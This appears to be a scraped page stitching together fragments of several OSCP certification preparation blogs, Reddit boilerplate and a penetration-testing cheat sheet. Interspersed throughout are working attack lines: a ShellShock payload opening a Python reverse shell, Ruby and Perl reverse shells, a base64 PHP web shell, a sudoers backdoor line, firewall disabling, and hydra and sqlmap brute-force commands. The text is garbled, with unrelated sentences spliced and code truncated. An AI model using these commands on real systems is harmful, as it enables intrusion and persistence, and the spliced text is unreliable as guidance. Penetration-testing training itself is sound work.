oscp alice walkthroughpiercing shop name ideas

Coming back in some time I finally established a foothold on another machine, so had 80 points by 4 a.m. in the morning; I was even very close to escalating the privileges but then decided to solve AD once again and take some missing screenshots. Take a break to calm down and reset your thoughts if youre stuck somewhere and dont know what to do. When source or directry listing is available check for credentials for things like DB. Link: https://www.vulnhub.com/entry/sar-1,425/ Recently, a bunch of new boxes. I felt comfortable with the machines after solving around 5560 machines from Tjnull Hackthebox List, therefore I switched to PWK Labs. 90 days lab will cost you 1350$. This will help you to break down the script and understand exactly what it does. In September of last year, I finally decided to take the OSCP and started preparing accordingly. All you need to do is: Read about buffer overflows and watch this, . If you are fluent in programming languages (Java, .NET, JavaScript, C, etc.) zip -r zipped.zip . *' -type l -lname "*network*" -printf "%p -> %l\n" 2> /dev/null, MySql supports # for commenting on top of , Find text recursively in files in this folder, grep -rnwl '/path/to/somewhere/' -e "pattern", wpscan --url --enumerate uap, ShellShock over http when you get response from cgi-bin which have server info only, wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1", cewl>>cewl, Wordpress password crack - https://github.com/micahflee/phpass_crack - see .251, cat /usr/share/wordlists/rockyou.txt | python /root/labs/251/phpass_crack-master/phpass_crack.py pass.txt -v, it seems john does a better job at php password cracking when using a wordlist [*] - Uploading payload ShgBSPrh.exe. Respect your procotors. So, make use of msfvenom and multi handler whenever you feel like the normal reverse shell isnt working out and you need to use encoders. Now start it fresh with a broader enumeration, making a note of any juicy information that may help later on. Walkthroughs are meant to teach you. Ping me on Linkedin if you have any questions. in the background whilst working through the buffer overflow. Specifically for the OSCP, I bought the HackTheBox subscription and started solving TJNull OSCP like boxes. "C:\Program Files\Python27\python.exe" "C:\Program Files\Python27\Scripts\pyinstaller-script.py" code.py, From http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet. Finally, buy a 30 days lab voucher and pwn as many machines as possible. By accepting all cookies, you agree to our use of cookies to deliver and maintain our services and site, improve the quality of Reddit, personalize Reddit content and advertising, and measure the effectiveness of advertising. Pwned 50100 vulnhub machines. So, I paused my lab and went back to TJ nulls recent OSCP like VM list. python -c 'import pty; pty.spawn("/bin/bash")', Find writable files for user: As I mentioned at the start there is no shame in turning to walkthroughs however it is important that you do not become reliant on them. Recent OSCP Changes (Since Jan 2022) The exam pattern was recently revised, and all exams after January 11, 2022 will follow the new pattern. Then, moving on to standalone machines, I began enumerating them one by one in order to discover low-hanging fruit, and within the following two hours, I was able to compromise another machine. Once enrolled you receive a lengthy PDF, a link to download the offline videos that are collated and well presented through your web browser, and one exam attempt ($150 per retake). I always manage to get SYSTEM but am unable to pop shell due to the AV. Hehe. Buy HackTheBox VIP & Offsec Proving Grounds subscription for one month and practice the next 30 days there. Took a VM snapshot a night before the exam just in case if things go wrong, I can revert to the snapshot state. As I went through the machines, I wrote writeups/blogs on how . If you found this guide useful please throw me some claps or a follow because it makes me happy :) Oscp. Section 1 describes the requirements for the exam, Section 2 provides important information and suggestions, and Section 3 specifies instructions for after the exam is complete. An, If you are still dithering in indecision about pursuing Pen Testing then Metasploitable 2 offers a simple free taster. sudo openvpn ~/Downloads/pg.ovpn I have read about others doing many different practice buffer overflows from different sources however the OSCP exams buffer overflow has a particular structure to it and third party examples may be misaligned. except for the sections named Blind SQL ). It consists in 3 main steps which are taught in the PWK course: Information gathering (Enumeration) Shell (Vulnerability exploitation) Privilege Escalation ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'. check_output check for files which stickey bits. The Advanced and Advanced+ machines are particularly interesting and challenging. Experience as a Security Analyst/SysAdmin/Developer/Computer Science Degree will provide a good foundation. Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): Heres a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'. Offsec Proving Grounds Practice now provides walkthroughs for all boxes Offsec updated their Proving Grounds Practice (the paid version) and now has walkthroughs for all their boxes. Based on my arduous journey and the mistakes I made along the way, I hope this guide addresses the questions that those who are new to Penetration Testing are asking and also helps to provide a roadmap to take you from zero to OSCP. If this is the case and you are still stuck, only then read a guide up to the point where you were stuck and no further (e.g. But I decided to schedule the exam after this. xhost +targetip,

 In base 64 PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJF9HRVRbJ2MnXSk7Pz48cHJlLz4K. If you want a .php file to upload, see the more featureful and robust php-reverse-shell. (Live footage of me trying to troubleshoot my Buffer Overflow script ), I began by resetting the machines and running. In mid-February, after 30 days into the OSCP lab, I felt like I can do it. That way, even if things go wrong, I just have to stay awake till maybe 23 a.m to know if I can pass or not, and not the whole night. I took another hour to replicate all the exploits, retake screenshots, check if I have the necessary screenshots, and ended the exam. For more information, please see our I didnt feel like pwning any more machines as I have almost completed TJNulls list.  I do a walkthrough of the InfoSec Prep OSCP box on VulnHub, including multiple privesc methods.You can download the box here: https://www.vulnhub.com/entry/i. ps -f ax for parent id  That moment, when I got root, I was laughing aloud and I felt the adrenaline rush that my dreams are coming true. netsh advfirewall set  allprofiles state off, Lookup windows version from product version in C:\Windows\explorer.exe: Similar to the second 20 pointer I could not find the way to root. I have left VHL as the fourth step due to its offering and higher price compared to others thus far. Took a VM snapshot a night before the exam just in case if things go wrong, I can revert to the snapshot state. This creates wordlist with min 10 letters and max 10 letters starting with 3 numbers, then string qwerty then special characters. host -l foo.org ns1.foo.org, complete enumeration If nothing happens, download Xcode and try again. 3_eip.py  (more in line with HTB) pathway with an advertised completion time of 28 and 47 hours respectively. Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which dont support the -e option. (Offensive Security have since introduced a Learning Pathmore on this further down), After my failed exam attempt I returned to HTB and rooted over 50 machines based on. Rather, being able to understand and make simple modifications to python exploit scripts is a good starting point. So, in order to prepare for Active Directory, I rescheduled my lab from December 5 to December 19, giving me 15 days to prepare. This came in handy during my exam experience.  Impacket is getting: CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found. But I never gave up on enumerating. Logged into proctoring portal at 5.15 and finished the identity verification. Successfully got the root privilege and the flag.txt . OSCP is an amazing offensive security certification and can really. THM offer a Complete Beginner and an Offensive Pentesting (more in line with HTB) pathway with an advertised completion time of 28 and 47 hours . Now I had 70 points (including bonus) to pass the Exam so I took a long break to eat dinner and a nap. The other mentioned services do not require pivoting.  At first, I cycled through 20 of the Easy rated machines using walkthroughs and watching ippsec videos. Purchasing the one month pass comes with a structured PDF course in which the modules are aligned to lab machines. If you have any questions, or if you see anything below that should be added, changed, or clarified, please contact me on Twitter: The hack begins by scanning the target system to see which ports are open sudo nmap -A -T4 -p22,80,33060 One of the simplest forms of reverse shell is an xterm session. I took only a 1-month subscription, spent about 15 days reading the PDF and solving exercises (which were worth 10 additional points), leaving me with only 15 days to complete the labs. Youll need to authorise the target to connect to you (command also run on your host): S'{2}' 	echo "userName ALL=(ALL:ALL) ALL">>/etc/sudoers Pasted the 4 IPs (excluding BOF) into targets.txt and started with, autorecon -t targets.txt  only-scans-dir, While that was running, I started with Buffer Overflow like a typical OSCP exam taker. transfer docker image to host by using root@kali:~/# docker save uzyexe/nmap -o nmap.tar and after copying on target: Identify if you are inside a container - cat /proc/self/cgroup | grep docker. Exactly a year ago (2020), I pwned my first machine in HTB. john --wordlist=/root/rockyou.txt pass.txt, echo gibs@noobcomp.com:$P$BR2C9dzs2au72.4cNZfJPC.iV8Ppj41>pass.txt, echo -n 666c6167307b7468655f717569657465 |xxd -r -p. PUT to webserver: Which is best? Back when I began my journey there were numerous recommendations for different platforms for various reasonsall of which proved to be rather confusing. The fix: For the remainder of the lab you will find bizarrely vague hints in the old Forumsome of them are truly stupendous. 	/bin/find / -perm -4001 -type f 2>/dev/null, uid and gid with root   Prior to enrolling onto PWK I advise spending several hours reading about buffer overflows and watching a few YouTube walkthroughs. However the PWK PDF has a significant module on it and you should definitely go through it and pivot into the different networks. 2_pattern.py The proving grounds machines are the most similar machines you can find to the machines on the actual OSCP exam and therefore a great way to prepare for the exam. An outline of my progress before I passed: The exam itself will not feature exploits you have previously come across. The PWK course exercises delve into PowerShell, any prior experience here will be a bonus. Created a recovery point in my host windows as well. Also, explore tools such as Impacket, Crackmapexec, Evil-winrm, Responder, Rubeus, Mimikatz. Meterpreter Script for creating a persistent backdoor on a target host. You will quickly improve your scripting skills as you go along so do not be daunted. cat foo|rev	reverse contents of cat, __import__("os").system("netstat -antp|nc 1234"), Deserialization (Pickle) exploit template, for x in 27017 28017; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done, A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. About 99% of their boxes on PG Practice are Offsec created and not from Vulnhub. The exam pattern was recently revised, and all exams after January 11, 2022 will follow the new pattern. You can generate the public key from the private key, and it will reveal the username: sudo ssh-keygen -y -f secret.decoded > secret.pub. If youve made it this far, youre probably interested in the certification, therefore I wish you Goodluck on your OSCP journey. VHL also includes an instance of Metasploitable 2 containing. Other than AD there will be 3 independent machines each with 20 marks. Xnest :1 The exam will include an AD set of 40 marks with 3 machines in the chain. This is the process that I went through to take notes, and I had more than enough information to write my report at the end. It will try to connect back to you ( on TCP port 6001. }, Hello there, I wanted to talk about how I passed OSCP new pattern, which includes Active Directory in the exam. Now that it's been identified, it seems the AV on Alice doesn't like me at all. My only dislike was that too many of the easier machines were rooted using kernel exploits. 5_return.py In this article, we will see a walkthrough of an interesting VulnHub machine called INFOSEC PREP: OSCP With the help of nmap we are able to For this reason I have left this service as the final step before PWK. If you have any questions or require any tips, I am happy to help on Discordhxrrvs#2715. Overview. http://mark0.net/soft-tridnet-e.html, find /proc -regex '\/proc\/[0-9]+\/fd\/. Whenever someone releases a writeup after passing OSCP, I would read it and make notes from their writeup as well. Though it seems like I completed the exam in ~9 hours and 30 minutes, I cant neglect the break hours as the enumeration scripts have been constantly running during all the breaks. I used the standard report template provided by offsec. Stay tuned for additional updates; Ill be publishing my notes that I made in the past two years soon. We used to look at other blogs and Ippsec videos after solving to get more interesting approaches to solve. Privilege Escalation As a first step towards privilege escalation, we want to find SUID set files. So learn as many techniques as possible that you always have an alternate option if something fails to produce output. It would have felt like a rabbit hole if I didnt have the enumeration results first on-hand. Use walkthroughs, but make notes of them so that you wont have to refer to a walkthrough if you had to pwn the same machine a few days later. I share my writeups of 50+ old PG Practice machines (please send a request): http://www.networkadminsecrets.com/2010/12/offensive-security-certified.html, https://www.lewisecurity.com/i-am-finally-an-oscp/, https://teckk2.github.io/category/OSCP.html, https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob, http://www.lucas-bader.com/certification/2015/05/27/oscp-offensive-security-certified-professional, http://www.securitysift.com/offsec-pwb-oscp/, https://www.jpsecnetworks.com/category/oscp/, http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/, https://alphacybersecurity.tech/my-fight-for-the-oscp/, https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/, https://legacy.gitbook.com/book/sushant747/total-oscp-guide/details, https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html, https://411hall.github.io/OSCP-Preparation/, https://h4ck.co/oscp-journey-exam-lab-prep-tips/, https://sinw0lf.github.io/?fbclid=IwAR3JTBiIFpVZDoQuBKiMyx8VpBQP8TP8gWYASa__sKVrjUMCg7Z21VxrXKk, 11/2019 - 02/2020: Root all 43/43 machines. If this is not the case, GitHub may have an updated version of the script. https://support.microsoft.com/en-us/help/969393/information-about-internet-explorer-versions, PE (switch admin user to NT Authority/System): Created a recovery point in my host windows as well. Sar (vulnhub)  Walkthrough | OSCP like lab | OSCP prep Hello hackers,First of all I would like to tell you this is the first blog i am writing so there can be chances of mistake so please give. By rejecting non-essential cookies, Reddit may still use certain cookies to ensure the proper functionality of our platform. ltR. Ill pass if I pwn one 20 point machine. So, I wanted to brush up on my Privilege escalation skills. I worked on VHL every day of my access and completed. Our next step is scanning the target machine. Get path of container in host file structure: docker_path=/proc/$(docker inspect --format  )/root. The best approach to complete is to solve with someone you know preparing for the same (if you are struggling to find someone, then use  Infosec prep  and  Offensive Security Discord server to find many people preparing for OSCP and various other certifications). Each path offers a free introduction.  Figure out dns server:   width: 90%; Once I got the initial shell, then privilege escalation was KABOOM! A Buffer overflow can be leveraged by an attacker with a goal of modifying a computer's memory to undermine or gain control of the . S'{1}' [*] - Created \ILaDAMXR.exe [+] - Service started successfully [*] Sending stage (175174 bytes) to However once you grasp that initial understanding all of the pieces will quickly fall into place. Recently, I hear a lot of people saying that proving grounds has more OSCP like VMs than any other source. I thank my family for supporting me. If you have made it this far Congratulations the end is near! Happy Hacking, Practical Ethical Hacking The Complete-Course, Some of the rooms from tryhackme to learn the basics-. This cost me an hour to pwn. So, after the initial shell, took a break for 20 minutes.   This guide explains the objectives of the OffSec Certified Professional (OSCP) certification exam. crunch 10 10 -t %%%qwerty^ > craven.txt Step through each request in Burp Suite to identify and resolve any issues. From, 20th February to 14th March (22 days prior to exam day), I havent owned a single machine. I strongly advise you to read the official announcement if you are unfamiliar with the new pattern. find / -perm +2000 -user root -type f 2>/dev/null In fact, during my preparation, I was ignoring the rapid7 blog posts while searching for exploits LMAO! My preferred tool is. One year, to be accurate. I did all the manual enumeration required for the second 20 point machine and ran the required auto-enumeration scripts as well. A place for people to swap war stories, engage in discussion, build a community, prepare for the course and exam, share tips, ask for help. I, recommend this as the jump in difficulty was huge. During my lab time I completed over. At first you will be going through ippsec videos and guides but eventually you will transition away from walkthroughs and work through machines on your own. Whichever you decide, do not pursue CEH . By rejecting non-essential cookies, Reddit may still use certain cookies to ensure the proper functionality of our platform. This is a walkthrough for Offensive Security's internal box on their paid subscription service, Proving Grounds. The only hurdle I faced in OSCP is the same issue that we face on HackTheBox. If nothing happens, download GitHub Desktop and try again. I sincerely apologize to Secarmy for wasting their 90 days lab , Whenever I tackle new machines, I did it like an OSCP exam.               and our With the help of nmap we are able to scan all open tcp portsStarting with the port number 80 which is http, [][root@RDX][~] #nikto --url, [root@RDX][~] #chmod 600 secret.txt, [root@RDX][~] #ssh -i secret.txt oscp@ It is important to mention the actual day to day work of a Penetration Tester differs greatly and online lab environments can only emulate a penetration test to such an extent. A more modern alternative to Metasploitable 2 is TryHackMe (8/pm) which features a fully functioning Kali Linux instance all in your browser (this is great for starting out but once you move to the next stages you will need your own virtual machine).                 sign in DO NOT UNDERRATE THIS MACHINE! This machine also offered a completely new type of vulnerability I had not come across before. This is one feature I like in particular that other services lack. Simply put, a buffer overflow occurs when inputted data occupies more space in memory than allocated. This my attempt to create a walk through on TryHackMe's Active Directory: [Task 1] Introduction Active Directory is the directory service for Windows Domain Networks. I've tried multiple different versions of the reverse shell (tried metasploit and my own developed python script for EB).  I just kept watching videos, reading articles and if I come across a new technique that my notes dont have, Ill update my notes. root@kali: ~/VulnHub/oscpPrep # ssh -i newssh-key oscp@ Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.-40-generic x86_64 privilege escalation courses. at in this example), we see it is a WordPress blog and the post there says: Use the username with the OpenSSH Private Key: sudo ssh -i secret.decoded oscp@ Total: 6 machines. look for a more suitable exploit using searchsploit, search google for valuable information, etc. net use z: \\\oscp\, https://www.iodigitalsec.com/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/, Once in, look for clues in current dir and user home dir, If you find both passwd and shadow you can use unshadow to combine them and then run john: Edit the new ip script with the following: #!/bin/sh ls -la /root/ > /home/oscp/ls.txt. After scheduling, my time started to run in slow motion. Based on my personal development if you can dedicate the time to do the above, you will be in a very good position to pass the OSCP on your. It took me 4 hours to get an initial foothold. To catch the incoming xterm, start an X-Server (:1  which listens on TCP port 6001). Total: 11 machines. Before starting, it will be helpful to read through the, on the lab structure and use the recommended, . You can filter through the different. [*] - Created \ShgBSPrh.exe [*] - Deleting \ShgBSPrh.exe [*] - Meterpreter session 9 closed. Einstein is apparently quoted to have said, Insanitydoing the same thing over and over again and expecting a different result. So when I get stuck, Ill refer to my notes and if I had replicated everything in my notes and still couldnt pwn the machine, then Ill see the walkthrough without guilt :), Feel free to make use of walkthroughs but make sure you learn something new every time you use them. So I followed Abraham Lincolns approach.  Woke at 4, had a bath, and drank some coffee. 3 hours to get an initial shell. python -c 'import os,pty; os.setresuid(1001,1001,1001); pty.spawn("/bin/bash")', Maintaing PE This page is the jouney with some tips, the real guide is HERE. An understanding of basic scripting will be helpful, you do not need to be able to write a script off the top of your head. I thank Secarmy(now dissolved into AXIAL), Umair Nehri, and Aravindha Hariharan. https://www.youracclaim.com/badges/0dc859f6-3369-48f8-b78a-71895c3c6787/public_url, https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0, https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d, https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html, https://medium.com/@calmhavoc/oscp-the-pain-the-pleasure-a506962baad, https://github.com/burntmybagel/OSCP-Prep, https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19, https://gr0sabi.github.io/security/oscp-insights-best-practices-resources/#note-taking, https://satiex.net/2019/04/10/offensive-security-certified-professional/amp/?__twitter_impression=true, https://hakin9.org/try-harder-my-penetration-testing-with-kali-linux-oscp-review-and-courselab-experience-my-oscp-review-by-jason-bernier/, http://dann.com.br/oscp-offensive-security-certification-pwk-course-review/, https://prasannakumar.in/infosec/my-walk-towards-cracking-oscp/, https://infosecuritygeek.com/my-oscp-journey/, https://acknak.fr/en/articles/oscp-tools/, https://www.linkedin.com/pulse/road-oscp-oluwaseun-oyelude-oscp, https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html, https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/, https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp, https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/, https://thor-sec.com/review/oscp/oscp_review/, https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1?files=1, https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt, https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html, https://github.com/UserXGnu/OSCP-cheat-sheet-1?files=1, https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/, http://ramunix.blogspot.com/2016/10/oscp-cheat-sheet.html?m=1, https://hausec.com/pentesting-cheatsheet/, https://github.com/ucki/URP-T-v.01?files=1, https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html, https://zsahi.wordpress.com/oscp-notes-collection/, https://github.com/weaknetlabs/Penetration-Testing-Grimoire?files=1, https://github.com/OlivierLaflamme/Cheatsheet-God?files=1, https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad, https://adithyanak.gitbook.io/oscp-2020/privilege-escalation, https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html, https://github.com/Ignitetechnologies/Privilege-Escalation, https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/, https://github.com/mzet-/linux-exploit-suggester, https://github.com/Anon-Exploiter/SUID3NUM, https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS, https://github.com/sleventyeleven/linuxprivchecker, https://adithyanak.gitbook.io/oscp-2020/windows-privilege-escalation, https://sushant747.gitbooks.io/total-oscp, https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/, http://www.fuzzysecurity.com/tutorials/16.html, https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation, https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, multi handler (aka exploit/multi/handler), Practice OSCP like Vulnhub VMs for the first 30 days. The start of this journey will be painfully slow as you overcome that initial learning curve and establish your own. You can essentially save up to 300$ following my preparation plan. nmap --script all , cewl www.megacorpone.com -m 6 -w mega-cewl.txt, john --wordlist=mega-cewl.txt --rules --stdout > mega-mangled, hydra -l garry -F -P /usr/share/wordlists/rockyou.txt -s 8080 http-post-form "/php/index.php:tg=login&referer=index.php&login=login&sAuthType=Ovidentia&nickname=^USER^&password=^PASS^&submit=Login:F=Failed:H=Cookie\: OV3176019645=a4u215fgf3tj8718i0b1rj7ia5", http-post-form ::F=, hydra -l root -P /root/rockyou.txt ssh, sqlmap -u --method POST --data "username=1&password=pass" -p "username,password" --cookie="PHPSESSID=crp8r4pq35vv0fm1l5td32q922" --dbms=MySQL --text-only --level=5 --risk=2, sqlmap -u "" --cookie="PHPSESSID=1im32c1q8b54vr27eussjjp6n2" -p pagename --level=5 --risk=3 -a, cut -c2-	cut the first 2 characters 

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oscp alice walkthrough